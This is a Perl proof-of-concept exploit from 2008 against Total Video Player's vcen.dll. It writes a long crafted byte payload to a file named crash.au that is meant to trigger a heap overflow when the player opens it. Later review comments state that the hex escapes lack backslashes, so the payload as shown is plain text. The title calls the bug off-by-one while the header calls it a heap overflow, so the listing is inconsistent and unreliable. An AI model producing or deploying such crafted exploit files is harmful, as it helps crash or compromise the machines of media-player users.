
# Title : Total Video Player (vcen.dll) Remote off by one Crash Exploit
# Published : 2008-11-24
# Author : Cnaph


###############################################################################
# Total Video Player (vcen.dll) Remote Heap Overflow Crash
#                                               By Cn4phux.
# Vendor: http://www.effectmatrix.com/
# Risk : high
# 
# The "<? TVP type= ?>" tag fails to handle long strings, which can lead to a heap overflow in TVP.
# This bug can be triggered remotely or locally: TVP parses any supplied file for a recognized header, even if the header does not correspond
# to the file type.
# Tested against Win XP SP1/SP2 FR, and 1.10/1.20 TVP.
   
# Crash-trigger file contents, built as one concatenated string literal.
#
# NOTE(review): as this listing stands, no backslash precedes any "x", so
# Perl treats each "xHH" as three ordinary characters rather than a \xHH
# byte escape — $payload is plain ASCII text, not the binary blob the
# "Heap Overflow" description above implies. Presumably the original
# used \xHH escapes and the backslashes were lost when the page was
# extracted; confirm against the author's source before relying on it.
my $payload =
"x2Ex52x4Dx46x00x00x00x12x00x01x00x00x00x00x00x00".
"x00x06x50x52x4Fx50x00x00x00x32x00x00x00x01x78xD4".
"x00x01x78xD4x00x00x05x78x00x00x05x78x00x00x00xA0".
"x00x00x45x42x00x00x07x41x00x03x75x70x00x00x02xDE".
"x00x02x00x09x43x4Fx4Ex54x00x00x00x40x00x00x00x01".
"x20x00x01x20x00x01x20x00x2Bx00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x4Dx44x50x52x00x00x00xACx00x00x00x00".
"x00x01x78xD4x00x01x78xD4x00x00x05x78x00x00x05x78".
"x00x00x00x00x00x00x07x41x00x00x48x8Fx0Cx41x75x64".
"x69x6Fx20x53x74x72x65x61x6Dx14x61x75x64x69x6Fx2F".
"x78x2Dx70x6Ex2Dx72x65x61x6Cx61x75x64x69x6Fx00x00".
"x00x5Ex2Ex72x61xFDx00x05x00x00x2Ex72x61x35x00x00".
"x00x10x00x05x00x00x00x4Ex00x19x00x00x05x78x00x00".
"x00x00x00x0Bx0Ax36x00x00x00x00x00x10x05x78x01x18".
"x00x00x00x00xACx44x00x00xACx44x00x00x00x10x00x02".
"x67x65x6Ex72x63x6Fx6Fx6Bx01x07x00x00x00x00x00x10".
"x01x00x00x03x08x00x00x25x00x00x00x00x00x08x00x05".
"x4Dx44x50x52x00x00x01xAEx00x00x00x01x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x10x6Cx6Fx67x69x63x61".
"x6Cx2Dx66x69x6Cx65x69x6Ex66x6Fx00x00x01x70x00x00".
"x01x70x00x00x00x00x00x00x00x09x00x00x00x1Fx00x00".
"x0Ex43x6Fx6Ex74x65x6Ex74x20x52x61x74x69x6Ex67x00".
"x00x00x00x00x04x00x00x00x00x00x00x00x33x00x00x09".
"x41x75x64x69x65x6Ex63x65x73x00x00x00x02x00x1Dx31".
"x30x30x25x20x51x75x61x6Cx69x74x79x20x44x6Fx77x6E".
"x6Cx6Fx61x64x20x28x56x42x52x29x3Bx00x00x00x00x1C".
"x00x00x09x61x75x64x69x6Fx4Dx6Fx64x65x00x00x00x02".
"x00x06x6Dx75x73x69x63x00x00x00x00x2Bx00x00x0Dx43".
"x72x65x61x74x69x6Fx6Ex20x44x61x74x65x00x00x00x02".
"x00x11x32x2Fx32x2Fx32x30x30x36x20x36x3Ax35x37x3A".
"x30x31x00x00x00x00x1Ax00x00x0Bx44x65x73x63x72x69".
"x70x74x69x6Fx6Ex00x00x00x02x00x02x20x00x00x00x00".
"x4Fx00x00x0Cx47x65x6Ex65x72x61x74x65x64x20x42x79".
"x00x00x00x02x00x36x48x65x6Cx69x78x20x50x72x6Fx64".
"x75x63x65x72x20x53x44x4Bx20x31x30x2Ex30x20x66x6F".
"x72x20x57x69x6Ex64x6Fx77x73x2Cx20x42x75x69x6Cx64".
"x20x31x30x2Ex30x2Ex30x2Ex35x34x35x00x00x00x00x16".
"x00x00x08x4Bx65x79x77x6Fx72x64x73x00x00x00x02x00".
"x01x00x00x00x00x2Fx00x00x11x4Dx6Fx64x69x66x69x63".
"x61x74x69x6Fx6Ex20x44x61x74x65x00x00x00x02x00x11".
"x32x2Fx32x2Fx32x30x30x36x20x36x3Ax35x37x3Ax30x31".
"x00x00x00x00x1Dx00x00x09x76x69x64x65x6Fx4Dx6Fx64".
"x65x00x00x00x02x00x07x6Ex6Fx72x6Dx61x6Cx00x44x41".
"x54x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41";

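# Write $payload to the proof-of-concept file on disk.
#
# Why the handle is $fh and not $file: the original wrote
# `open(my $file, ">>$file")`, which re-declares $file in the same scope.
# That compiles (the new `my` is not visible until the next statement),
# but it masks the filename variable for everything that follows and is
# flagged under `use warnings`. The 3-arg open keeps the mode separate from
# the filename, and close() is checked because buffered write errors only
# surface there.
my $file = "crash.au";
# Append mode is kept from the original; note that running the script twice
# appends a second copy of the payload rather than overwriting the file.
open(my $fh, '>>', $file) or die "Cannot open $file: $!";
binmode $fh;    # the file is meant to be raw bytes: no newline translation on Windows
print {$fh} $payload or die "Cannot write $file: $!";
close($fh) or die "Cannot close $file: $!";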
#Made in Algeria. /Cn4phux
